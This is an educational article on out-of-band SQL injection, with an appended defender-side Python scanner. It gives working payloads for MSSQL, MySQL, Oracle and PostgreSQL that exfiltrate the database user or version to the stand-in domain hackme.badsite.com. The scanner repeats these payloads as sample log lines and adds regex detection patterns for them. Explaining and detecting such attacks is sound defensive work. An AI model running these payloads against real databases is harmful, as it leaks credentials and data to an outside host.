Out of Band SQL Injection

What is an Out of Band SQL Injection?
When an attacker is not able to exploit an SQL Injection through the same channel, they try to retrieve the results through some other channel. This technique is called Out of Band SQL Injection (OOB SQL Injection). It is possible only if certain features are enabled in the database. Out of Band SQL Injection is also used by attackers as an alternative to time-based blind SQL Injection, because server response time depends on too many factors and is sometimes unreliable.
How does an Out of Band SQL Injection work?
As explained above, Out of Band SQL Injection delivers results through some other channel, so an attacker must use database functions that can communicate with an external network. Each kind of database has its own functions for this purpose. For example, MSSQL uses "EXEC master", MySQL uses "LOAD_FILE", Oracle uses DBMS_LDAP.INIT and PostgreSQL uses dblink_connect.
What can an attacker do?
An attacker can exploit Out of Band SQL Injection to retrieve sensitive information such as the database name, database version, database user, etc. OOB SQL Injection is rarer than other types of SQL Injection because it needs certain features to be enabled in the database, and in some databases superuser privileges are also required.
Example:
MSSQL: Here is an example of how EXEC can be used to transfer information to an external server. In this example, system_user is prepended to an attacker-controlled domain: if the username is dbuser1, an external call is made to dbuser1.hackme.badsite.com and the username is disclosed to the attacker.

DECLARE @data varchar(1024);
SELECT @data = (SELECT system_user);  
EXEC('master..xp_dirtree "\\'+@data+'.hackme.badsite.com\foo$"');

MySQL: MySQL's LOAD_FILE function loads files, and an attacker can abuse it as shown in the following example. Here LOAD_FILE tries to load a file from the host subdomain.hackme.badsite.com, where subdomain in our case is the hex encoding of the username.

SELECT LOAD_FILE(CONCAT('\\\\', (SELECT HEX(CONCAT(user(),"\n"))), '.hackme.badsite.com\\test.txt'));

Oracle: In Oracle, the DBMS_LDAP.INIT function initialises an LDAP session with the host given as its first argument. In our case, the version name is prepended to an attacker-controlled domain, for example 10.2.2.hackme.badsite.com.

SELECT DBMS_LDAP.INIT((SELECT version FROM v$instance)||'.hackme.badsite.com',80) FROM dual;

PostgreSQL: PostgreSQL supports loading extensions, and the dblink extension provides the dblink_connect function, which opens a connection to another database. Its connection string accepts a parameter named host, and an attacker can abuse this parameter by supplying an attacker-controlled host.

CREATE EXTENSION dblink;
SELECT dblink_connect('host=hackme.badsite.com user=postgres password=password dbname=dvdrental');
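As an added defender-side example (not part of the original post), the following Python flags the four function patterns above in constructed database audit-log lines and decodes the hex-encoded DNS label from the MySQL variant so an analyst can see what value was exposed. The log line format "<timestamp> <dbms> <db_user> <sql>" is an assumption.

```python
import re

# Constructed sample audit-log lines (not from any real system). Assumed
# format: "<timestamp> <dbms> <db_user> <sql>", one statement per line.
SAMPLE_LOG = r"""2024-01-01T10:00:01 mssql app_user EXEC('master..xp_dirtree "\\'+@data+'.hackme.badsite.com\foo$"')
2024-01-01T10:00:02 mysql app_user SELECT id, title FROM film WHERE id = 42
2024-01-01T10:00:03 mysql app_user SELECT LOAD_FILE(CONCAT('\\\\', (SELECT HEX(CONCAT(user(),"\n"))), '.hackme.badsite.com\\test.txt'))
2024-01-01T10:00:04 oracle app_user SELECT DBMS_LDAP.INIT((SELECT version FROM v$instance)||'.hackme.badsite.com',80) FROM dual
2024-01-01T10:00:05 postgres app_user SELECT dblink_connect('host=hackme.badsite.com user=postgres password=x dbname=dvdrental')
2024-01-01T10:00:06 postgres app_user SELECT dblink_connect('dbname=reports')
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<dbms>\S+) (?P<user>\S+) (?P<sql>.*)$")

# Indicators for the four techniques described above:
# (dbms, compiled regex over the SQL text, human-readable reason).
RULES = [
    ("mssql", re.compile(r'xp_dirtree\s*"?\s*\\\\', re.I), "xp_dirtree pointed at a UNC path"),
    ("mysql", re.compile(r"LOAD_FILE\s*\(.*\\\\", re.I), "LOAD_FILE with a UNC path"),
    ("oracle", re.compile(r"DBMS_LDAP\.INIT\s*\(", re.I), "DBMS_LDAP.INIT call from an application session"),
    ("postgres", re.compile(r"dblink_connect\s*\(.*\bhost=", re.I), "dblink_connect with an explicit host"),
]


def scan_audit_log(log_text):
    """Return one finding per log line whose SQL matches an OOB indicator."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed line; skip rather than crash the scan
        for dbms, pattern, reason in RULES:
            if m["dbms"] == dbms and pattern.search(m["sql"]):
                findings.append({"line": lineno, "dbms": dbms, "user": m["user"], "reason": reason})
    return findings


def decode_hex_label(fqdn):
    """For a DNS name from resolver logs whose leftmost label is hex (the MySQL
    HEX(...) pattern above), return the decoded leaked value, else None."""
    label = fqdn.split(".", 1)[0]
    if len(label) % 2 or not re.fullmatch(r"[0-9A-Fa-f]+", label):
        return None
    return bytes.fromhex(label).decode("utf-8", errors="replace").strip()


if __name__ == "__main__":
    for finding in scan_audit_log(SAMPLE_LOG):
        print(finding)
    # Constructed DNS name: HEX("root@localhost\n") as the leftmost label.
    print(decode_hex_label("726F6F74406C6F63616C686F73740A.hackme.badsite.com"))
```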
